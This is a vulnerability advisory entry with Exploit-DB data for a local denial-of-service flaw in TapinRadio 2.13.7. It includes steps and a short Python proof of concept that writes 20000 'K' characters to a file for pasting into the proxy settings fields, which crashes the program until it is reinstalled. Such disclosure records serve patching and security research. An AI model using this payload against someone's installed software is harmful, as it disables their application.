Vendor: TapinRadio
By: Ismael Nava
CVSS: 7.5 (HIGH)
Vulnerability Type: Denial of Service
CWE: N/A
Product Name: TapinRadio
Affected Version From: 2.13.7
Affected Version To: 2.13.7
Patch Exists: YES
Related CWE: N/A
CPE: a:raimersoft:tapinradio:2.13.7
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home x64
2020

TapinRadio 2.13.7 – Denial of Service (PoC)

TapinRadio 2.13.7 is vulnerable to a denial-of-service condition. An attacker can create a new .txt file containing a buffer of 20000 'K' characters and paste its content into the Username and Address fields in the Preferences option of the program. After OK is clicked, the program crashes, and the user has to uninstall and reinstall it.

Mitigation:

Update to the latest version of TapinRadio

Exploit-DB raw data:

# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Version: 2.13.7 x64
# Tested on: Windows 10 Home x64

#STEPS
# Open the program TapinRadio 
# In Settings select Preferences option
# Click in Miscellaneous and click in Set Application Proxy
# Run the python exploit script, it will create a new .txt file
# Copy the content of the file "Mikon.txt"
# Paste the content in the field Username and Address and click in OK
# Click in Ok again
# After TapinRadio closed, the program did not work again if the user tries to open it again, so it is necessary to uninstall and install it again
# End :)


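# Payload: 20000 'K' characters to paste into the proxy fields
buffer = 'K' * 20000

try:
    # Write the payload to Mikon.txt; the with-block closes the file
    with open("Mikon.txt", "w") as file:
        file.write(buffer)

    print("Archive ready")
except OSError:
    # Only file I/O errors are expected here
    print("Archive no ready")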